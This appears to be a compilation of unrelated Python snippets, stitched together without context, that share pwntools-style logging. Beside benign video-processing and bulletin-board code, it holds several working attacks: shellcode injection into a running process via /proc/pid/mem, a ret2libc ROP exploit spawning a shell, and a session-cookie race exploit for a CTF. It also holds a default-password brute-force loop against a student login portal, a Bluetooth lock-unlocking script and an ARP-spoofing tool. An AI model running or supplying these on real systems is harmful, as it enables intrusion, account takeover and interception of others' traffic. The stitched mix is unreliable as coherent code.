def genscript(info, funct): fstring = '\'{' fstring += '"name": "{}", '.format(funct.name) fstring += '"parameters": [' for p in info["parameters"]: if p["monitor"]: fstring += '{' fstring += '"name": "{}", '.format(p["name"]) fstring += '"content": "\' + ' if (p["type"] == "string"): fstring += '"\\' + '\\x" + ' fstring += 'Memory.readCString(' fstring += 'args[{}]'.format(info["parameters"].index(p)) fstring += ').split("").map(function(a){return ' fstring += 'a.charCodeAt(0).toString(16)}).join("\\' fstring += '\\x")' elif (p["type"] == "num"): fstring += 'args[{}]'.format(info["parameters"].index(p)) fstring += '.toInt32()' elif (p["type"] == "addr"): fstring += 'args[{}]'.format(info["parameters"].index(p)) else: log.warn("UNKNOWN TYPE IN: " + p) fstring += ' + \'"}, ' if fstring[-2:] == ', ': # remove ', ' fstring = fstring[:-2] fstring += ']' fstring += '}\'' d = {'addr': funct.absolute_address, 'format': fstring} tosend = SCRIPT.format(**d) return tosend
def exploit(base): log.info('Registering user') user = register(base) log.info(f'User: {user}') log.info('Logging in') sess = login(base, user['username'], user['password']) log.info('Delaying session write') thread = do_async(lambda: create_random_note(base, sess, 'my title', 'my content')) time.sleep(1) log.info('Committing account sudoku') session_cookie = delete_me(base, sess) log.info(f'Cookie: {session_cookie}') log.info('Waiting for delayed write') thread.join() log.info('Getting flag note') sess.cookies.set('connect.sid', session_cookie) flag_note = get_note(base, sess, 'flag') if flag_note is None: log.warn('could not get flag') else: flag = flag_note['content'] log.success(f'Flag: {flag}')
def detect_from_cam_and_write(yolo, opname, cap, frameno, create, cv2): try: log.info("Starting the proccessing of the frames") net, ln, labels = Setup(yolo, cv2) while (True): # get next frame ret, frame = cap.read() if not ret: break current_img = frame.copy() current_img = imutils.resize(current_img, width=480) video = current_img.shape frameno += 1 if (frameno % 2 == 0 or frameno == 1): processedImg = ImageProcess(current_img, net, ln, labels, cv2) Frame = processedImg cv2.imshow("Image", Frame) if create is None: fourcc = cv2.VideoWriter_fourcc(*'XVID') create = cv2.VideoWriter(opname, fourcc, 30, (Frame.shape[1], Frame.shape[0]), True) # write frame to output video create.write(Frame) if cv2.waitKey(1) & 0xFF == ord('s'): break except KeyboardInterrupt: log.warn('Interrupted') exit(0)
def find_dub(params): for p in params: tocheck = [] for x in params[p]: tocheck.append(x) if len(tocheck) != len(set(tocheck)): log.warn("Same {} found in same run!".format(p))
def set_notification_enabled(self): svc = self.device.getServiceByUUID(self.SERVICE_UUID) ch = svc.getCharacteristics() for c in ch: if c.uuid == self.READ_FROM: ch_handle = c.getHandle() log.warn(f'Set notification enable for UUID : {c.uuid}, handle : {ch_handle+1}') self.device.writeCharacteristic(ch_handle+1,b"\x01\x00",withResponse=True) break
def push_format(s_orig): s = Ptt.noctrl(s_orig) m = re.match(r'^([^ ]+) ([\w]+) *: (.*) (\d\d/\d\d \d\d:\d\d)$', s.strip()) if m is None: log.warn('Error parsing push: ' + repr(s_orig)) return None, None, None, s push_type = m.group(1) # Replace Unicode arrow with ASCII chars (weird width on terminal) if push_type == '\x08\x08→': push_type = '->' return m.group(4), push_type, m.group(2), m.group(3)
def get_last_page(self): if self._article is None: raise ValueError('Article not set') p = self.p p.send('$') # End p.recvrepeat(0.1) while True: p.send('\x0c') # Ctrl-L re-render screen lines = p.recvrepeat(0.1).split('\r\n')[:-1] if lines: break log.warn('Re-render failed, retrying') lines = map(Ptt.noctrl, lines) lines = map(lambda l: l.strip(), lines) return lines
async def send(self, payload, bypass=False): message = {"janus": "message", "transaction": transaction_id()} message.update(payload) async with self._session._http.post(self._url, json=message) as response: data = await response.json() log.info('post[response]: {}'.format(data)) if bypass: return None if data["janus"] != "ack": log.warn('data["janus"] != "ack --> something is wrong"') return data response = await self._queue.get() assert response["transaction"] == message["transaction"] return response
def detect_from_file_and_write(yolo, opname, cap, frameno, create, cv2): try: # show the progress total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT)) bar = progressbar.ProgressBar(maxval=total_frames, widgets=[ progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage() ]) log.info( "Starting the proccessing of the video, it may take time depending on the length of the video" ) bar.start() net, ln, labels = Setup(yolo, cv2) while (True): # get next frame ret, frame = cap.read() if not ret: break current_img = frame.copy() current_img = imutils.resize(current_img, width=480) video = current_img.shape frameno += 1 bar.update(frameno) if (frameno % 2 == 0 or frameno == 1): processedImg = ImageProcess(current_img, net, ln, labels, cv2) Frame = processedImg # show the modified frame cv2.imshow("Image", Frame) if create is None: fourcc = cv2.VideoWriter_fourcc(*'XVID') create = cv2.VideoWriter(opname, fourcc, 30, (Frame.shape[1], Frame.shape[0]), True) # write frame to output video create.write(Frame) if cv2.waitKey(1) & 0xFF == ord('s'): break bar.finish() except KeyboardInterrupt: log.warn('Interrupted') exit(0)
def find_dub_all(params): ps = [p for p in params] all_keys = [] for p in ps: all_keys += p.keys() all_keys = list(set(all_keys)) for key in all_keys: index = 0 for param in params: tocheck = params[:index] + params[index + 1:] listing = [] for c in tocheck: if c.get(key): listing.append(c[key]) # If you think hard enough, this makes sense: listing = [i for j in listing for i in j] if params[index].get(key): for x in params[index][key]: if x in listing: log.warn("Same {} found in different runs".format(key)) index = index + 1
def assign_token(self,token): self.token = token log.warn(f'Got token {token}! First lets check LOCK_STATE') self.get_lock_state() log.warn(f'Gonna unlock anyway') self.unlock() log.warn(f'Just for fun get Battery level') self.get_battery()
def tail(self, board, aid, poll_interval=5): self.board = board self.article = aid last = self.get_last_page() for l in last: yield Ptt.push_format(l) + (False, ) # Not follow while True: try: time.sleep(poll_interval) self.reload_article() cur = self.get_last_page() # Find new pushes pos = len(cur) while pos > 0: if last[-1] == cur[pos - 1]: break pos -= 1 if pos == 0: log.warn('New pushes more than 1 page, some may be lost') for l in cur[pos:]: yield Ptt.push_format(l) + (True, ) # Follow last = cur except KeyboardInterrupt: break
def tail(self, board, aid, poll_interval=5): self.board = board self.article = aid last = self.get_last_page() for l in last: yield Ptt.push_format(l) + (False,) # Not follow while True: try: time.sleep(poll_interval) self.reload_article() cur = self.get_last_page() # Find new pushes pos = len(cur) while pos > 0: if last[-1] == cur[pos - 1]: break pos -= 1 if pos == 0: log.warn('New pushes more than 1 page, some may be lost') for l in cur[pos:]: yield Ptt.push_format(l) + (True,) # Follow last = cur except KeyboardInterrupt: break
def export_function(f): fdesc = {} fdesc["name"] = f.name fdesc["parameters"] = [] fdesc["monitor"] = True for p in f.params: entry = {} entry["name"] = p.name if(p.isptr): entry["type"] = "addr" if("char" in p.type): entry["type"] = "string" else: entry["type"] = "num" entry["monitor"] = False if(p.name): fdesc["parameters"].append(entry) filename = "functions/" + f.name + ".json" if(os.path.isfile(filename)): log.warn("File " + filename + " already exists!") else: with open(filename, 'w') as outfile: json.dump(fdesc, outfile, sort_keys=True, indent=4, separators=(',', ': '))
log.success(f'Form Token: {FORMTOKEN}') headers = {'Referer': URL} BASE_TARGET = 'B2009700' DEFAULT_PASSWORD = '******' for _ in range(10, 100): username = BASE_TARGET + str(_) data = { 'username': username, 'password': DEFAULT_PASSWORD, '__RequestVerificationToken': FORMTOKEN, 'returnUrl': '', } resp = SESSION.post(URL, data, headers=headers).text if 'Зурган кодыг оруулна уу' in resp: # start new session continue elif 'Оюутны код эсвэл нууц үг буруу байна.' in resp: log.warn(f'No luck: {username}') else: log.success('====== Pwned ========') log.success(f'Username: {username}') log.success(f'Password: {password}') log.success('====== Pwned ========') print(resp) input()
s = remote("localhost", server_port) print(s.recvline().decode()) params = loads(s.recvline()) g = params["g"] p = params["p"] h = params["h"] print(params) res = [] for cnt in range(proof_times): log.info(f"~~~~~ round {cnt + 1} ~~~~~") x = loads(s.recvline())["x"] log.info(f" I got x: {x}") c = randint(0, 1) log.info(f" I send c: {c}") s.sendline(dumps({"c": c})) y = loads(s.recvline())["y"] log.info(f" I got y: {y}") if pow(g, y, p) == x * pow(h, c, p) % p: log.info(" Accepted") res.append(True) else: log.warn(" wrong responce...") res.append(False) s.close() if all(res): log.info("Alice is a valid prover") else: log.warn("Alice is not a valid prover")
def dlinject(pid, lib_path, stopmethod="sigstop"): with open(f"/proc/{pid}/maps") as maps_file: for line in maps_file.readlines(): ld_path = line.split()[-1] if re.match(r".*/ld-.*\.so", ld_path): ld_base = int(line.split("-")[0], 16) break else: log.error("Couldn't find ld.so! (we need it for _dl_open)") log.info("ld.so found: " + repr(ld_path)) log.info("ld.so base: " + hex(ld_base)) dl_open_offset = lookup_elf_symbol(ld_path, "_dl_open") if not dl_open_offset: log.error("Unable to locate _dl_open symbol") dl_open_addr = ld_base + dl_open_offset log.info("_dl_open: " + hex(dl_open_addr)) if stopmethod == "sigstop": log.info("Sending SIGSTOP") os.kill(pid, signal.SIGSTOP) while True: with open(f"/proc/{pid}/stat") as stat_file: state = stat_file.read().split(" ")[2] if state in ["T", "t"]: break log.info("Waiting for process to stop...") time.sleep(0.1) elif stopmethod == "cgroup_freeze": freeze_dir = "/sys/fs/cgroup/freezer/dlinject_" + os.urandom(8).hex() os.mkdir(freeze_dir) with open(freeze_dir + "/tasks", "w") as task_file: task_file.write(str(pid)) with open(freeze_dir + "/freezer.state", "w") as state_file: state_file.write("FROZEN\n") while True: with open(freeze_dir + "/freezer.state") as state_file: if state_file.read().strip() == "FROZEN": break log.info("Waiting for process to freeze...") time.sleep(0.1) else: log.warn("We're not going to stop the process first!") with open(f"/proc/{pid}/syscall") as syscall_file: syscall_vals = syscall_file.read().split(" ") rip = int(syscall_vals[-1][2:], 16) rsp = int(syscall_vals[-2][2:], 16) log.info(f"RIP: {hex(rip)}") log.info(f"RSP: {hex(rsp)}") stage2_path = f"/tmp/stage2_{os.urandom(8).hex()}.bin" shellcode = asm(fr""" // push all the things pushf push rax push rbx push rcx push rdx push rbp push rsi push rdi push r8 push r9 push r10 push r11 push r12 push r13 push r14 push r15 // Open stage2 file mov rax, 2 # SYS_OPEN lea rdi, path[rip] # path xor rsi, rsi # flags (O_RDONLY) xor rdx, rdx # mode syscall mov r14, rax # save the fd for later // mmap it mov rax, 9 # SYS_MMAP xor rdi, rdi # addr mov rsi, {STAGE2_SIZE} # len mov rdx, 0x7 # prot (rwx) mov r10, 0x2 # flags (MAP_PRIVATE) mov r8, r14 # fd xor r9, r9 # off syscall mov r15, rax # save mmap addr // close the file mov rax, 3 # SYS_CLOSE mov rdi, r14 # fd syscall // delete the file (not exactly necessary) mov rax, 87 # SYS_UNLINK lea rdi, path[rip] # path syscall // jump to stage2 jmp r15 path: .ascii "{stage2_path}\0" """) with open(f"/proc/{pid}/mem", "wb+") as mem: # back up the code we're about to overwrite mem.seek(rip) code_backup = mem.read(len(shellcode)) # back up the part of the stack that the shellcode will clobber mem.seek(rsp - STACK_BACKUP_SIZE) stack_backup = mem.read(STACK_BACKUP_SIZE) # write the primary shellcode mem.seek(rip) mem.write(shellcode) log.info("Wrote first stage shellcode") stage2 = asm(fr""" cld fxsave moar_regs[rip] // Open /proc/self/mem mov rax, 2 # SYS_OPEN lea rdi, proc_self_mem[rip] # path mov rsi, 2 # flags (O_RDWR) xor rdx, rdx # mode syscall mov r15, rax # save the fd for later // seek to code mov rax, 8 # SYS_LSEEK mov rdi, r15 # fd mov rsi, {rip} # offset xor rdx, rdx # whence (SEEK_SET) syscall // restore code mov rax, 1 # SYS_WRITE mov rdi, r15 # fd lea rsi, old_code[rip] # buf mov rdx, {len(code_backup)} # count syscall // close /proc/self/mem mov rax, 3 # SYS_CLOSE mov rdi, r15 # fd syscall // move pushed regs to our new stack lea rdi, new_stack_base[rip-{STACK_BACKUP_SIZE}] mov rsi, {rsp-STACK_BACKUP_SIZE} mov rcx, {STACK_BACKUP_SIZE} rep movsb // restore original stack mov rdi, {rsp-STACK_BACKUP_SIZE} lea rsi, old_stack[rip] mov rcx, {STACK_BACKUP_SIZE} rep movsb lea rsp, new_stack_base[rip-{STACK_BACKUP_SIZE}] // call _dl_open (https://github.com/lattera/glibc/blob/895ef79e04a953cac1493863bcae29ad85657ee1/elf/dl-open.c#L529) lea rdi, lib_path[rip] # file mov rsi, 2 # mode (RTLD_NOW) xor rcx, rcx # nsid (LM_ID_BASE) (could maybe use LM_ID_NEWLM (-1)) mov rax, {dl_open_addr} call rax fxrstor moar_regs[rip] pop r15 pop r14 pop r13 pop r12 pop r11 pop r10 pop r9 pop r8 pop rdi pop rsi pop rbp pop rdx pop rcx pop rdx pop rax popf mov rsp, {rsp} jmp old_rip[rip] old_rip: .quad {rip} old_code: .byte {",".join(map(str, code_backup))} old_stack: .byte {",".join(map(str, stack_backup))} .align 16 moar_regs: .space 512 lib_path: .ascii "{lib_path}\0" proc_self_mem: .ascii "/proc/self/mem\0" new_stack: .balign 0x8000 new_stack_base: """) with open(stage2_path, "wb") as stage2_file: os.chmod(stage2_path, 0o666) stage2_file.write(stage2) log.info(f"Wrote stage2 to {repr(stage2_path)}") if stopmethod == "sigstop": log.info("Continuing process...") os.kill(pid, signal.SIGCONT) elif stopmethod == "cgroup_freeze": log.info("Thawing process...") with open(freeze_dir + "/freezer.state", "w") as state_file: state_file.write("THAWED\n") # put the task back in the root cgroup with open("/sys/fs/cgroup/freezer/tasks", "w") as task_file: task_file.write(str(pid)) # cleanup os.rmdir(freeze_dir) log.success("Done!")
def main(): p = get_process() # Stage 1 # Initial payload payload = b"A" * ExploitInfo.offset_buf_to_eip ropchain = p32(ExploitInfo.puts_plt) ropchain += p32(ExploitInfo.main_func) ropchain += p32(ExploitInfo.puts_got) payload = payload + ropchain p.clean() p.sendline(payload) # Take 4 bytes of the output leak = p.recv(4) puts_addr = u32(leak) log.info("Here the leak : %s" % binascii.hexlify(leak)) log.info("puts is at : 0x%x" % puts_addr) p.clean() # Calculate libc base libc_base = puts_addr - ExploitInfo.offset_puts log.info("libc base : 0x%x" % libc_base) # Stage 2 # Calculate offsets system_addr = libc_base + ExploitInfo.offset_system + 3 # +3 to avoid null byte on address """ Part of system: 0xf7e0d200 <+0>: sub esp,0xc 0xf7e0d203 <+3>: mov eax,DWORD PTR [esp+0x10] 0xf7e0d207 <+7>: call 0xf7f0737d """ padding = '\x90' * 0xc # cause we jump from first instruction exit_addr = libc_base + ExploitInfo.offset_exit binsh_addr = libc_base + ExploitInfo.offset_str_bin_sh log.info("system is at : 0x%x" % system_addr) log.info("/bin/sh is at : 0x%x" % binsh_addr) log.info("exit is at : 0x%x" % exit_addr) # Build 2nd payload payload2 = b"A" * ExploitInfo.offset_buf_to_eip ropchain2 = p32(system_addr) ropchain2 += padding ropchain2 += p32(exit_addr) # Optional: Fix disallowed character by scanf by using p32(binsh_addr+5) # Then you'll execute system("sh") ropchain2 += p32(binsh_addr) payload2 = payload2 + ropchain2 if b'\x00' in payload2: log.warn('WARNING: null in payload\n' 'Exploit may fail.') p.sendline(payload2) log.success("Here comes the shell!") p.clean() p.interactive()
░ ░ ''' print(a) print_banner() scanner = Scanner() log.info(f"Scannig around for BLE.. Wait for {SCAN_TIME} seconds") devices = scanner.scan(SCAN_TIME) log.info(f"Scannig done. Found {len(devices)}") buckles = [] if len(devices) == 0: log.warn("Where are you dude ? :X Maybe increase scan time ?") exit() c = 0 c2 = 0 totallen = len(devices) with log.progress('Taking closer look to found devices') as progress: for dev in devices: time.sleep(0.2) for (adtype, desc, value) in dev.getScanData(): if value == DEVICE_NAME: log.debug( f"Found {DEVICE_NAME} boi!\nRSSI: {dev.rssi} ADDR: {dev.addr} RAWDATA: {dev.rawData}" ) c += 1 scanData = dev.rawData
from Crypto.Util.number import inverse, long_to_bytes as ltb from sympy import isprime from pwn import log n = 0xDEADBEEF e = 0xDEADBEEF c = 0XDEADBEEF log.info('Checking N is prime') if not isprime(n): log.warn('N is not prime number') exit() log.success('N is prime') d = inverse(e, n - 1) m = pow(c, d, n) log.info(f'd: {d}') log.info(f'm: {m}') log.success(f'flag: {ltb(m).decode()}')
def print_exceptions(): """ Print exceptions list """ global g_exceptions for e in g_exceptions: log.warn("Exception occured : {}".format(e))
def main(target): global PATH log.info("Going to analyze {}".format(target)) try: session = frida.get_usb_device().attach(target) except frida.ServerNotRunningError: try: log.error("Please start frida server first") except: sys.exit(-1) except frida.TimedOutError: try: log.error("Frida timeout...") except: sys.exit(-1) with open("config/modules.json") as j: MODULES = json.load(j) log.info("Will look at: {}".format(', '.join(MODULES))) PATH = "results/" + sys.argv[1] + "/" if not os.path.exists(PATH): os.makedirs(PATH) runnr = len([x for x in os.listdir(PATH) if os.path.isdir(PATH + x)]) PATH += "run_" PATH += str(runnr) PATH += "/" if not os.path.exists(PATH): os.makedirs(PATH) # Get only needed Modules modules = session.enumerate_modules() tmp = [] for M in MODULES: tmp.append(modules[[x.name for x in modules].index(M)]) modules = tmp functions = [] for x in modules: functions += x.enumerate_exports() log.info("Found {} functions".format(len(functions))) # Which functions do I need to look at? for filename in os.listdir("functions/"): with open("functions/" + filename) as j: FUNCTIONS.append(json.load(j)) lookup = [x["name"] for x in FUNCTIONS] log.info("Will look for: {}".format(', '.join(lookup))) for f in lookup: try: result = functions[[x.name for x in functions].index(f)] except ValueError: log.warn("Function " + f + "not found") continue log.info("Found {} in {} @ {}".format(result.name, result.module.name, hex(result.absolute_address))) script = session.create_script( genscript(FUNCTIONS[lookup.index(f)], result)) script.on('message', on_message) script.load() log.info("Injected all needed scripts, now listening") sys.stdin.read()
def main(): parser = argparse.ArgumentParser(description="ARP spoof script") parser.print_help = print_help parser.add_argument("-t", "--targets", help="Victim IP Address to ARP poison", required=True) parser.add_argument( "-g", "--gateway", help="the host you wish to intercept packets for (usually the gateway)", required=True) parser.add_argument("-i", "--interface", help="Specify an interface", required=True) parser.add_argument("-a", "--arp", help="Scan With ARP instead of nmap scan", action='store_true', required=False) args = parser.parse_args() targets, gateway, iface, __arp = args.targets, args.gateway, args.interface, args.arp global interface_mac interface_mac = get_if_hwaddr(iface) log.info(f"Started at {t()}") if '/' in targets: if not __arp: p = log.progress( f"Scanning {CYAN}network{RESET} for {GREEN}connected{RESET} devices" ) up, down, List, targets = NmapConnectedDevices(targets, p) _displayWithNmap(up, down, List) else: targets = ipaddress.IPv4Network(targets) targets = [str(target) for target in targets.hosts()] p = log.progress( f"Scanning {CYAN}network{RESET} for {GREEN}connected{RESET} devices" ) d_v, targets = XGetConnectedDevices(targets, p) displayFounded(d_v) else: targets = targets.split(",") if gateway in targets: targets.remove(gateway) if getLocalIp() in targets: targets.remove(getLocalIp()) if len(targets) == 0: log.failure( f'no {GREEN}clients{RESET} detected in this {WHITE}network.{RESET}' ) log.warn( f'if you think this is an {YELLOW}error{RESET}, please specify your {GREEN}targets.{RESET}' ) log.failure('exiting...') exit(0) p = log.progress("Enabling IP Routing") time.sleep(0.5) enable_ip_route(p) try: p = log.progress('Generating mac address') change_mac(iface, p) v_t = f'{RESET},{GREEN} '.join(targets) log.success( f"Starting {CYAN}attack{RESET} on {GREEN}{len(targets)}{RESET} valid targets → '{GREEN}{v_t}{RESET}'." ) while True: with concurrent.futures.ThreadPoolExecutor( max_workers=len(targets)) as executor: { executor.submit(XSpoofed, str(target), gateway): target for target in targets } except KeyboardInterrupt: log.warning( f"{RED}Detected{YELLOW} CTRL+C ! {RESET}restoring the network, please wait...\n" ) with concurrent.futures.ThreadPoolExecutor( max_workers=len(targets)) as executor: { executor.submit(XRestored, str(target), gateway): target for target in targets } p = log.progress( f"Restoring {WHITE}{iface} {GREEN}→ {WHITE}{interface_mac}{RESET} mac address" ) change_mac(iface, p, mac=interface_mac) except OSError as err: change_mac(iface, p, mac=interface_mac) exit(log.failure(str(err)))